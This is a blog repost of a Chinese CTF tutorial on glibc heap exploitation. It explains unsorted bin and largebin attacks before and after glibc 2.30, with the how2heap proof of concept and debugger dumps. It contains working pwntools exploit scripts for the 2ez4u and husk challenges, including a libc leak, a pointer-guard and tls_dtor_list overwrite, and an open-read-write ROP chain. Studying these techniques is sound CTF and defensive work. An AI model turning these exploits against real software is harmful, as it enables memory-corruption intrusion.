ordar

  • 主页
  • 个人文章
  • 收集文章
  • 聚合文章
  • 工具箱
所有文章 关于

起风了!歌手:买辣椒也用券

ordar

  • 主页
  • 个人文章
  • 收集文章
  • 聚合文章
  • 工具箱

跟上时代之高版本GLIBC下堆利用(三)

阅读数:次 2022-04-07
字数统计: 4.2k字   |   阅读时长≈ 21分

看看也不错

0x00 前言

说到向任意地址上写一个较大的数值,下意识绝对会想到unsorted bin attack,在一些较低版本的题目中unsorted bin attack是奏效的,但是在glibc-2.29之后,增加了一些保护unsorted bin attack这种利用方法基本上是不能用了。不过可以找到替代的利用方法。就像上一篇文章我们所讲到的Tcache Stashing Unlink Attack,可以实现向任意指定位置写入可控的值。而有一个新的利用方法largebin attack可以任意地址写一个堆地址,这样来看的话不需要leak_heap_addr就可以将可控制堆块的地址写入目标地址。

0x01 缅怀过去

感谢unsorted bin attack在glibc-2.29之前为pwn做出的贡献。

还是要简单的说一下unsorted bin attack的利用原理的:Unsorted Bin在使用过程中,采用的遍历顺序是FIFO(先进先出),即挂进链表的时候依次从Unsorted bin的头部向尾部挂,取的时候是从尾部向头部取。在程序malloc时,如果fast bin、small bin中找不到对应大小的chunk,就会尝试从Unsorted bin中寻找chunk。如果取出来的chunk的size刚好满足,则直接交给用户,否则就会把这些chunk分别插入到对应的bin中。结合源码来看

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

unsortedbin的bk指针指向的是后一个释放的堆块地址,那么如果我们能够控制unsortedbin的bk指针指向一个可写的地址内,就可以向其地址写上一个unsorted bin的地址。

0x02 关于largebin attack的过去

关于在glibc-2.29之前的largebin attack,是在申请largebin的过程中,伪造largebin的bk_nextsize,实现非预期内存申请。这种利用的关键在于伪造一个largebin chunk,然后将fake chunk申请出来。

largebin的分配源码是这样的:

可以看到largebin中并不是像其他bin一样存放的都是大小相同的chunk,在largebin中存储的是大小不同的chunk,所以这就应声而出了两个largebin chunk特有的两个字段——fd_nextsize和bk_nextsize。largebin中的chunk按照大小排序,fd_nextsize指向下一个比当前chunk大小小的第一个空闲块,bk_nextsize指向前一个比当前chunk大小大的第一个空闲chunk,这样的结构有利于程序更好的遍历largebin中的堆块。

/*
 If a large request, scan through the chunks of current bin in
 sorted order to find smallest that fits.  Use the skip list for this.
   */
  if (!in_smallbin_range (nb))
{
  bin = bin_at (av, idx);
  /* skip scan if empty or largest chunk is too small */
  if ((victim = first (bin)) != bin &&  //获取链表的第一个chunk
  (unsigned long) (victim->size) >= (unsigned long) (nb))
{
  victim = victim->bk_nextsize;  //反向遍历,chunk size链表,直到找到第一个大于等于所需chunk大小的chunk退出循环
  while (((unsigned long) (size = chunksize (victim)) <
  (unsigned long) (nb)))
victim = victim->bk_nextsize;
  /* Avoid removing the first entry for a size so that the skip
 list does not have to be rerouted.  */
  if (victim != last (bin) && victim->size == victim->fd->size)
victim = victim->fd;
  remainder_size = size - nb;
  unlink (av, victim, bck, fwd); //large bin的unlink操作
  /* Exhaust */
  if (remainder_size < MINSIZE)
{
  set_inuse_bit_at_offset (victim, size);
  if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}
  /* Split */
  else
{
  remainder = chunk_at_offset (victim, nb);
  /* We cannot assume the unsorted list is empty and therefore
 have to perform a complete insert here.  */
  bck = unsorted_chunks (av);
  fwd = bck->fd;
  if (__glibc_unlikely (fwd->bk != bck))
{
  errstr = "malloc(): corrupted unsorted chunks";
  goto errout;
}
  remainder->bk = bck;
  remainder->fd = fwd;
  bck->fd = remainder;
  fwd->bk = remainder;
  if (!in_smallbin_range (remainder_size))
{
  remainder->fd_nextsize = NULL;
  remainder->bk_nextsize = NULL;
}
  set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
  set_head (remainder, remainder_size | PREV_INUSE);
  set_foot (remainder, remainder_size);
}
  check_malloced_chunk (av, victim, nb);
  void *p = chunk2mem (victim);
  alloc_perturb (p, bytes);
  return p;
}
}

实例-2017lctf-2ez4u

我们主要是了解largebin attack的利用,题目的逆向部分我们简单描述一下:程序保护全开,经典的菜单题目,增查删改一应俱全,free函数里面存在uaf漏洞,在free堆块之后没有将堆块指针清零。

leak_heap_addr

通过释放两个largebin大小的堆块,使他们构成一条largebin的链子,这样的话chunk中的fd_nextsize与bk_nextsize会被赋值,再利用UAF打印即可得到堆块地址。

add(0x60,  '0'*0x60 ) # 0
add(0x60,  '1'*0x60 ) # 1
add(0x60,  '2'*0x60 ) # 2
add(0x60,  '3'*0x60 ) # 3
add(0x60,  '4'*0x60 ) # 4
add(0x60,  '5'*0x60 ) # 5
add(0x60,  '6'*0x60 ) # 6
add(0x3f0, '7'*0x3f0) # 7
add(0x30,  '8'*0x30 ) # 8
add(0x3e0, '9'*0x3d0) # 9 
add(0x30,  'a'*0x30 ) # a
add(0x3f0, 'b'*0x3e0) # b 
add(0x30,  'c'*0x30 ) # c
dele(0x9)  ##释放第一个大块
dele(0xb)  ##释放第二个大块
dele(0x0)
gdb.attach(io)
add(0x400, '0'*0x400)  #申请一个较大的块,使得unsorted bin数组清空
# leak
show(0xb)  ##泄露得到堆地址
io.recvuntil('num: ')
print hex(c_uint32(int(io.recvline()[:-1])).value)
io.recvuntil('description:')
HEAP = u64(io.recvline()[:-1]+'\x00\x00')-0x7e0
log.info("heap base 0x%016x" % HEAP)

伪造largebin chunk

在上一步泄露了heap地址,剩下的前期任务就是要泄露libc。使用的方法就是利用的伪造largebin chunk。不需要将伪造的堆块释放,修改之前被释放堆块的bk_nextsize字段即可,对应到源代码中代码即victim = victim->bk_nextsize,这一点使用UAF即可做到,但想要将该堆块申请出来,还需要绕过unlink的限制,这也可以通过UAF实现。在可以将伪造的堆块申请出来之后,我们可以在伪造的堆块中包含有正常的small bin,这样就可以达到泄露出libc地址以及修改内存的目的。

target_addr = HEAP+0xb0 # 1
chunk1_addr = HEAP+0x130# 2
chunk2_addr = HEAP+0x1b0# 3
victim_addr = HEAP+0xc30# b
# large bin attack
edit(0xb, p64(chunk1_addr)) # victim  ##修改victim = victim->bk_nextsize,伪造堆块开始
edit(0x1, p64(0x0)+p64(chunk1_addr))# target ##这一步是为了绕过unlink的fd与bk检查
chunk2  = p64(0x0)
chunk2 += p64(0x0)
chunk2 += p64(0x421)
chunk2 += p64(0x0)
chunk2 += p64(0x0)
chunk2 += p64(chunk1_addr)  ##这一步是为了绕过fd_nextsize与bk_nextsize检查
edit(0x3, chunk2) # chunk2
chunk1  = ''
chunk1 += p64(0x0)
chunk1 += p64(0x0)
chunk1 += p64(0x411)
chunk1 += p64(target_addr-0x18)
chunk1 += p64(target_addr-0x10)
chunk1 += p64(victim_addr)
chunk1 += p64(chunk2_addr)  ##伪造的堆块
edit(0x2, chunk1) # chunk1
edit(0x7, '7'*0x198+p64(0x410)+p64(0x411))  ##伪造的堆块后加上结构体。
dele(0x6)
dele(0x3)
add(0x3f0, '3'*0x30+p64(0xdeadbeefdeadbeef)) # chunk1, arbitrary write !!!!!!! ##将伪造的堆块申请出来,从此便可为所欲为。。。
add(0x60,  '6'*0x60 ) # 
show(0x3) ##伪造的堆块中包含small bin,泄露libc地址
io.recvuntil('3'*0x30)
io.recv(8)
LIBC = u64(io.recv(6)+'\x00\x00')-0x3c4be8
log.info("libc base 0x%016x" % LIBC)

剩下的就是简单的利用uaf和fastbin attack hijack free_hook为system。

0x03 关于如今的largebin attack

在新出的glibc版本中如2.31(目前比赛主流的版本)增加了两个检查使得之前的largebin attack没有办法使用惹

检查一

if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");

检查二

if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");

凡是需要找个实例

这次还是找到了how2heap的largebin_attack.c

image.png

代码如下:

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>
/*
A revisit to large bin attack for after glibc2.30
Relevant code snippet :
if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
*/
int main(){
  /*Disable IO buffering to prevent stream from interfering with heap*/
  setvbuf(stdin,NULL,_IONBF,0);
  setvbuf(stdout,NULL,_IONBF,0);
  setvbuf(stderr,NULL,_IONBF,0);
  printf("\n\n");
  printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n");
  printf("Check 1 : \n");
  printf(">if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n");
  printf(">malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n");
  printf("Check 2 : \n");
  printf(">if (bck->fd != fwd)\n");
  printf(">malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n");
  printf("This prevents the traditional large bin attack\n");
  printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");
  printf("====================================================================\n\n");
  size_t target = 0;
  printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target);
  size_t *p1 = malloc(0x428);
  printf("First, we allocate a large chunk [p1] (%p)\n",p1-2);
  size_t *g1 = malloc(0x18);
  printf("And another chunk to prevent consolidate\n");
  printf("\n");
  size_t *p2 = malloc(0x418);
  printf("We also allocate a second large chunk [p2]  (%p).\n",p2-2);
  printf("This chunk should be smaller than [p1] and belong to the same large bin.\n");
  size_t *g2 = malloc(0x18);
  printf("Once again, allocate a guard chunk to prevent consolidate\n");
  printf("\n");
  free(p1);
  printf("Free the larger of the two --> [p1] (%p)\n",p1-2);
  size_t *g3 = malloc(0x438);
  printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");
  printf("\n");
  free(p2);
  printf("Free the smaller of the two --> [p2] (%p)\n",p2-2);
  printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2);
  printf("   and one chunk in unsorted bin [p2] (%p)\n",p2-2);
  printf("\n");
  p1[3] = (size_t)((&target)-4);
  printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);
  printf("\n");
  size_t *g4 = malloc(0x438);
  printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2);
  printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n");
  printf("  the modified p1->bk_nextsize does not trigger any error\n");
  printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd->nexsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);
  printf("\n");
  printf("In out case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target);
  printf("Target (%p) : %p\n",&target,(size_t*)target);
  printf("\n");
  printf("====================================================================\n\n");
  assert((size_t)(p2-2) == target);
  return 0;
}

从此poc调试中去学习一下新型largebin attack的工作过程

首先是程序申请了4个堆块分别为0x428、0x18、0x418、0x18

申请的g1和g2是为了防止两个比较大的堆块合并.

0x55555575a000 PREV_INUSE {
  mchunk_prev size = 0x0,
  mchunksize = 0x291,
  fd = 0x0,
  bk = 0x0,
  fd nextsize = 0x0,
  bk nextsize = 0x0,
}
0x55555575a290 PREV_INUSE {
  mchunk_prev size = 0x0,
  mchunksize = 0x431,
  fd = 0x0,
  bk = 0x0,
  fd nextsize = 0x0,
  bk nextsize = 0x0,
}
0x55555575a6c0  FASTBIN {
  mchunk_prev size = 0x0,
  mchunksize = 0x21,
  fd = 0x0,
  bk = 0x0,
  fd nextsize = 0x0,
  bk nextsize = 0x421,
}
0x55555575a6e0 PREV_INUSE {
  mchunk_prev size = 0x0,
  mchunksize = 0x421,
  fd = 0x0,
  bk = 0x0,
  fd nextsize = 0x0,
  bk nextsize = 0x0,
}
0x55555575ab00 PREV_INUSE {
  mchunk_prev size = 0x0,
  mchunksize = 0x20501,
  fd = 0x0,
  bk = 0x0,
  fd nextsize = 0x0,
  bk nextsize = 0x0,
}

再往后释放了p1堆块,到unsorted bin中

unsortedbin
all: 0x55555575a290 -> 0x7ffff7fc1be0 (main arena+96) <- 0x55555575a290

之后有分配了一个比p1大的堆块使得p1堆块能够进入largebin中

largebins
0x400: 0x55555575a290 -> 0x7ffff7fc1fd0 (main arena+1104) <- 0x55555575a290
pwndbg>

然后程序free p2堆块进入到unsorted bin中

unsortedbin
all: 0x55555575a6e0 -> 0x7ffff7fc1be0 (main_arena+96) <- 0x55555575abe0
smallbins
empty
largebins
0x400: 0x55555575a290 -> 0x7ffff7fc1fd0 (main arena+1104) <- 0x55555575a290
pwndbg>l

然后就是修改了p1chunk的bk_nextsize指向target-0x20

修改前:
0000000000000000  0000000000000431
00007ffff7fc1fd0  00007ffff7fc1fd0
000055555575a290  000055555575a290
0000000000000000  0000000000000000
修改之后:
0000000000000000  0000000000000431
00007ffff7fc1fd0  00007ffff7fc1fd0
000055555575a290  00007fffffffddc0
0000000000000000  0000000000000000
0000000000000000  0000000000000000

此时target-0x20的值为0x7fffffffddc0。

下面的这一步就要用到如下的代码了:

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}

程序下一步是malloc了一个比p2还要大的堆块,与p1同理,这个时候p2就会从unsortedbin中放入largebin中。此时就用到了上面的关键代码。victim 是我们的 p2,fwd 为 largebin 的链表头,bck为 largebin 中的最后一个chunk,也就是最小的那个,也就是我们这里的 p1。

取上边代码最关键的三行

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;

根据我们分析到的实际问题进行实体性简化:

p2->fd_nextsize = &p1
p2->bk_nextsize = p1->bk_nextsize
p1->bk_nextsize = bk_nextsize->fd_nextsize = victim

然后我们是将p1的bk_nextsize改为了target-0x20,所以就可以得到这样的表识:

p2->fd_nextsize = &p1
p2->bk_nextsize = p1->bk_nextsize
p1->bk_nextsize = (target-0x20)->fd_nextsize = victim

其实,这三行置零最重要的是最后一行的(target-0x20)->fd_nextsize = victim这就相当于在(target-0x20)+0x20也就是target的地方写下victim也就是p2的地址。

0x04 常见利用方式

这种写大数的行为,我们可以用来修改global_max_fast,来使程序中分配的堆块都被识别成fastbin,这样来进行一些可以实现的fastbin attack。再恶劣一点的环境来说,我们可以利用其来进行指针的劫持,劫持为我们可控的地方,在可控的地方为造出原本应有的结构体产生劫持程序流的效果(iofile_attack:你直接说我名字得了)。

0x05 题目实例

2021湖湘杯2.34的pwn——husk,chunk申请范围是0x40f到0x500,漏洞是uaf

我们利用这个方式就是:通过两次largebin attack将已知地址写入结构体指针tls_dtor_list和fs:0x30(tcbhead_t->pointer_guard)里,然后风水布置堆块,伪造dtor_list结构体,接下来就是利用__call_tls_dtors函数来调用我们的指针。

一点回顾

在系列文章第一篇最后写到了比较方便的gadget去间接控制rdx寄存器就是这里用到了

mov rdx, [rdi+8]
mov [rsp+0C8h+var_C8], rax
callqword ptr [rdx+20h]

可以通过这个gadget通过rdi来控制rdx寄存器。

exp:

附上网传exp:

#!/usr/bin/env python3
#coding=utf-8
from pwn import*
import os
context.log_level = 'debug'
context.arch='amd64'
binary = './pwn' 
main_arena = 2198624
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
#context.terminal = ['tilix', '-x', 'sh', '-c']
#context.terminal = ['tilix', 'splitw', '-v']
local = 1
if local == 1:
io=process(binary)
else:
io=remote()
elf=ELF(binary)
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(index,size,flag=1):
pay = b'\x01'
pay += p8(index)
pay += p16(size)
if flag == 1:
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
else:
return pay
def free(index,flag=1):
pay = b'\x02'
pay += p8(index)
if flag == 1:
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
else:
return pay
def show(index,flag=1):
pay = b'\x03'
pay += p8(index)
if flag == 1:
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
else:
return pay
def edit(index,size,content,flag=1):
pay = b'\x04'
pay += p8(index)
pay += p16(size)
pay += content
if flag == 1:
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
else:
return pay
add(0,0x410)#0
add(1,0x460)#1
add(2,0x418)#2
add(3,0x440)#3
add(4,0x410)#4
#---free(1) and show(1)---
pay = free(1,0)
pay += show(1,0)
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
#-------------------------
#---------leak------------
libc_base = u64(ru(b'\x7f')[-6:].ljust(0x8,b'\x00')) - main_arena - 96
su('libc_base',libc_base)
pointer_guard_addr = libc_base - 0x2890
tls_dtor_list_addr = libc_base - 0x2918
su('pointer_guard_addr',pointer_guard_addr)
su('tls_dtor_list_addr',tls_dtor_list_addr)
set_context = libc_base + libc.sym['setcontext'] + 61
fh = libc.sym['__free_hook']+libc_base
#0x000000000005dfd1 : mov rax, rdi ; ret 
#0x0000000000169e90 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
binsh_addr = libc_base + next(libc.search(b'/bin/sh\0'))
ret = libc_base + libc.sym['setcontext'] + 334
syscall = next(libc.search(asm("syscall\nret")))+libc_base
#---------------------------------------
#------largebin attack and leak heap----
pay = free(3,0)
pay += edit(1,0x20,p64(0)*3+p64(pointer_guard_addr-0x20),0)
pay += add(5,0x500,0)#5
pay += show(1,0)
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
ru('Malloc Done\n')
heap = u64(r(6).ljust(8,b'\0')) - 0x2f50
su('heap',heap)
pay = edit(1,0x20,p64(heap+0x2f50)+p64(libc_base+main_arena+1120)+p64(heap+0x2f50)+p64(heap+0x2f50),0)
pay += edit(3,0x20,p64(libc_base+main_arena+1120)+p64(heap+0x26c0)+p64(heap+0x26c0)+p64(heap+0x26c0),0)
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
#---------------------------------------
add(1,0x460)#1
add(3,0x440)#3
#------largebin attack ------------------
free(1)
pay = free(3,0)
pay += edit(1,0x20,p64(0)*3+p64(tls_dtor_list_addr-0x20),0)
pay += add(5,0x500,0)#5
pay += show(1,0)
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
ru('Malloc Done\n')
heap = u64(r(6).ljust(8,b'\0')) - 0x2f50
su('heap',heap)
pay = edit(1,0x20,p64(heap+0x2f50)+p64(libc_base+main_arena+1120)+p64(heap+0x2f50)+p64(heap+0x2f50),0)
pay += edit(3,0x20,p64(libc_base+main_arena+1120)+p64(heap+0x26c0)+p64(heap+0x26c0)+p64(heap+0x26c0),0)
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
#---------------------------------------
#0x0000000000169e90 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
#--------------------------------------
pay = add(1,0x460,0)#1
pay+=free(2,0)#0
pay+=add(2,0x430,0)#1
pay += b'\x05'
ru("Pls input the opcode\n")
s(pay)
#--------------------------------------
rop = (0x0000000000169e90+libc_base)^(heap+0x2f50)
rop = ((rop>>(64-0x11))|(rop<<0x11))
pay = b''.ljust(0x410,b's')+p64(rop)+p64(heap+0x26d0)
edit(2,len(pay),pay)
gdb.attach(io)
payload = p64(0)+p64(heap+0x26d0)+p64(0)+p64(0)+p64(set_context)
payload = payload.ljust(0x70,b'\0')+p64(fh&0xfffffffffffff000)#rsi
payload = payload.ljust(0x68,b'\0')+p64(0)#rdi
payload = payload.ljust(0x88,b'\0')+p64(0x2000)#rdx
payload = payload.ljust(0xa0,b'\0')+p64((fh&0xfffffffffffff000)+8)#bytes(frame)
payload = payload.ljust(0xa0,b'\0')+p64(syscall)#rip
edit(1,len(payload),payload)#make rdx = chunk3
add(1,0x550)
ru(b'ERROR\n')
pop_rdx_r12_ret = 0x0000000000122431+libc_base
layout = [next(libc.search(asm('pop rdi\nret')))+libc_base
,fh&0xfffffffffffff000
,next(libc.search(asm('pop rsi\nret')))+libc_base
,0
,p64(pop_rdx_r12_ret)
,p64(0)
,p64(0)
,next(libc.search(asm('pop rax\nret')))+libc_base
,2
,syscall
,next(libc.search(asm('pop rdi\nret')))+libc_base
,3
,next(libc.search(asm('pop rsi\nret')))+libc_base
,(fh&0xfffffffffffff000)+0x200
,p64(pop_rdx_r12_ret)
,p64(0x30)
,p64(0)
,next(libc.search(asm('pop rax\nret')))+libc_base
,0
,syscall
,next(libc.search(asm('pop rdi\nret')))+libc_base
,1
,next(libc.search(asm('pop rsi\nret')))+libc_base
,(fh&0xfffffffffffff000)+0x200
,p64(pop_rdx_r12_ret)
,p64(0x30)
,p64(0)
,next(libc.search(asm('pop rax\nret')))+libc_base
,1
,syscall]
shellcode=b'./flag'.ljust(8,b'\x00')+flat(layout)
gdb.attach(proc.pidof(io)[0])
s(shellcode)
shell()

0x06 后记

我认为在这么卷的时代,这种新的利用方式将成为之后的主流攻击方式。

0x07 参考链接

(11条消息) glibc-2.29 large bin attack 原理_TUANZI_Dum的博客-CSDN博客

(11条消息) 好好说话之Unsorted Bin Attack_hollk的博客-CSDN博客

Largebin Attack for Glibc 2.31 - 安全客,安全资讯平台 (anquanke.com)


  • 本文作者: 大能猫
  • 本文来源: 奇安信攻防社区
  • 原文链接: https://forum.butian.net/share/1456
  • 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!
赏

谢谢你请我吃糖果

支付宝
微信
  • CTF

扫一扫,分享到微信

2022DASCTF X SU 三月春季挑战赛 ALL Misc&amp;amp;Web
RE与算法-tea加密算法
  1. 1. 0x00 前言
  2. 2. 0x01 缅怀过去
  3. 3. 0x02 关于largebin attack的过去
    1. 3.1. 实例-2017lctf-2ez4u
      1. 3.1.1. leak_heap_addr
      2. 3.1.2. 伪造largebin chunk
  4. 4. 0x03 关于如今的largebin attack
    1. 4.1. 凡是需要找个实例
  5. 5. 0x04 常见利用方式
  6. 6. 0x05 题目实例
    1. 6.1. 一点回顾
    2. 6.2. exp:
  7. 7. 0x06 后记
  8. 8. 0x07 参考链接
© 2022 ordar
Home:MY HOME
本站总访问量次 | 本站访客数人
  • 所有文章
  • 关于

tag:

  • 移动安全
  • 安全工具
  • CTF
  • 漏洞分析
  • 渗透测试
  • 划水摸鱼
  • 硬件与物联网
  • 安全管理
  • 区块链安全
  • 安全技术
  • 众测渗透
  • 技术讨论
  • WEB安全
  • 二进制安全
  • 企业安全

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置:

      jsonContent:
        meta: false
        pages: false
        posts:
          title: true
          date: true
          path: true
          text: false
          raw: false
          content: false
          slug: false
          updated: false
          comments: false
          link: false
          permalink: false
          excerpt: false
          categories: false
          tags: true
    

  • 【实战】镜像检材取证和嫌疑人证据场景下实战思路教程 PART Ⅲ

    NaN-NaN-NaN

    #CTF

  • 美团CTF2022-Writeup

    NaN-NaN-NaN

    #CTF

  • 记一次C/S架构客户端配置文件泄露导致的内网沦陷

    NaN-NaN-NaN

    #渗透测试

  • .NET MVC实现虚拟WebShell第3课之IAuthorizationFilter

    NaN-NaN-NaN

    #漏洞分析

  • 某开源堡垒机历史漏洞分析

    NaN-NaN-NaN

    #安全技术#WEB安全

  • 浅谈JFinal的DenyAccessJsp绕过

    NaN-NaN-NaN

    #渗透测试

  • PHP伪协议的一点新发现(php//temp)

    NaN-NaN-NaN

    #漏洞分析

  • CVE-2022-33980命令执行漏洞分析

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • 从前端代码审计挖掘未授权进入后台到文件上传拿下某色情网站

    NaN-NaN-NaN

    #安全技术#WEB安全

  • Dll劫持注入从原理到白加黑漏洞利用

    NaN-NaN-NaN

    #安全技术#二进制安全

  • mimikatz和shellcode免杀

    NaN-NaN-NaN

    #安全工具

  • 【实战】取证流程全解析Otter CTF实战操作 PART Ⅱ

    NaN-NaN-NaN

    #CTF

  • 对writeObject流程动点手脚

    NaN-NaN-NaN

    #CTF#安全技术

  • 关于&quot;linux capability&quot;的两个特殊案例

    NaN-NaN-NaN

    #安全技术#企业安全

  • GenieACS CVE-2021-46704认证前RCE漏洞分析

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • x微前台绕过鉴权执行sql

    NaN-NaN-NaN

    #漏洞分析

  • 从羊城杯一道题学习高版本JDK下JNDI的利用

    NaN-NaN-NaN

    #CTF

  • goby指纹提取与yara逆向.md

    NaN-NaN-NaN

    #安全工具#安全技术

  • 记一次较为详细的某CMS代码审计

    NaN-NaN-NaN

    #安全技术#WEB安全

  • WeiPHP 5.0 sql注入漏洞(bind_follow)浅析

    NaN-NaN-NaN

    #漏洞分析

  • 【实战】内存镜像下的数字取证实战操作 Part Ⅰ

    NaN-NaN-NaN

    #漏洞分析

  • 一些BAT的XSS实例(四)高级篇

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • 利用ASP.NET Web API Help Page文件上传

    NaN-NaN-NaN

    #安全技术#WEB安全

  • 基于netfilter的rootkit

    NaN-NaN-NaN

    #安全技术#企业安全

  • quickjs程序逆向

    NaN-NaN-NaN

    #CTF

  • Vcenter实战利用方式总结

    NaN-NaN-NaN

    #渗透测试

  • 不常见的内存与流量取证 -- WMCTF 2022 1!5!

    NaN-NaN-NaN

    #CTF#安全技术

  • CVE-2020-8558-跨主机访问127.0.0.1

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • 红日安全团队ATT&amp;amp;CK(二)实战系列靶场

    NaN-NaN-NaN

    #安全技术#WEB安全

  • “黑猫”又伸出恶魔之手?揭秘BlackCat病毒的三重勒索

    NaN-NaN-NaN

    #安全技术#WEB安全

  • 安卓学习思路方法总结(五)

    NaN-NaN-NaN

    #移动安全

  • 在线某系统远程代码执行

    NaN-NaN-NaN

    #渗透测试

  • 安卓学习思路方法总结(四)

    NaN-NaN-NaN

    #移动安全

  • 一次针对安全人员免杀工具的投毒事件分析

    NaN-NaN-NaN

    #渗透测试

  • 通过Scheme Flooding达成的本地安装软件痕迹探测浅析

    NaN-NaN-NaN

    #漏洞分析

  • CVE-2022-1292的分析

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • Gitlab常见漏洞复现及后利用

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • formbook商业木马剖析

    NaN-NaN-NaN

  • 地级市HVV | 未授权访问合集

    NaN-NaN-NaN

    #渗透测试

  • 从DesperateCat到EL webshell初探

    NaN-NaN-NaN

    #渗透测试

  • 从mcms历史漏洞中捡漏

    NaN-NaN-NaN

    #安全技术#WEB安全

  • 2022 网鼎杯玄武组-you can find it 题解—Spring通用MemShell改造

    NaN-NaN-NaN

    #CTF#安全技术

  • “电幕行动”(Bvp47)技术细节报告(二)——关键组件深度揭秘

    NaN-NaN-NaN

  • 结合CTF浅析HTTP请求走私与waf绕过

    NaN-NaN-NaN

    #漏洞分析

  • 2022网鼎杯go逆向拾遗之路

    NaN-NaN-NaN

    #CTF

  • 某后台管理系统的审计

    NaN-NaN-NaN

    #安全技术#WEB安全

  • DIR-815 固件模拟以及CVE复现

    NaN-NaN-NaN

    #漏洞分析

  • 老生常谈的JNDI——JDK8下的JNDI

    NaN-NaN-NaN

    #漏洞分析

  • 关于那WebSocket劫持的二三事

    NaN-NaN-NaN

    #安全技术#WEB安全

  • pwn2own2021中的Cisco路由器

    NaN-NaN-NaN

    #硬件与物联网

  • 从2022 网鼎杯拾遗 UPX

    NaN-NaN-NaN

  • 一些BAT的XSS实例(三)中级篇

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • psexec原理分析和实现

    NaN-NaN-NaN

    #安全工具

  • 针对某堡垒机漏洞分析(一)

    NaN-NaN-NaN

  • 恶意样本自动化配置提取初探

    NaN-NaN-NaN

    #漏洞分析

  • 红队开发基础-基础免杀(四)

    NaN-NaN-NaN

    #安全技术#二进制安全

  • 揭开新型窃密软件的面纱:伪装成CDR画图应用安装包

    NaN-NaN-NaN

    #安全技术#WEB安全

  • Linux提权基础分享和讨论

    NaN-NaN-NaN

    #安全技术#技术讨论

  • 老树开新花,某OA getSqlData接口SQLi再利用

    NaN-NaN-NaN

    #漏洞分析

  • Emotet 银行木马 296.exe 病毒样本分析(一)

    NaN-NaN-NaN

    #漏洞分析

  • 记一次攻防演练实战总结

    NaN-NaN-NaN

    #渗透测试

  • Exchange利用方式总结

    NaN-NaN-NaN

    #渗透测试

  • Cobaltstrike4.0 学习——http分阶段stagebeacon上线流量刨根问底

    NaN-NaN-NaN

    #安全工具

  • .NET 实现虚拟WebShell第2课之AuthenticationFilter

    NaN-NaN-NaN

    #渗透测试

  • CVE-2020-28413 MantisBT SQL注入漏洞分析

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • 一些BAT的XSS实例(二)进阶篇

    NaN-NaN-NaN

    #漏洞分析#安全技术

  • JAVA常用框架SQL注入审计

    NaN-NaN-NaN

    #安全技术#WEB安全

  • 记一次地级市某行业专项攻防演练

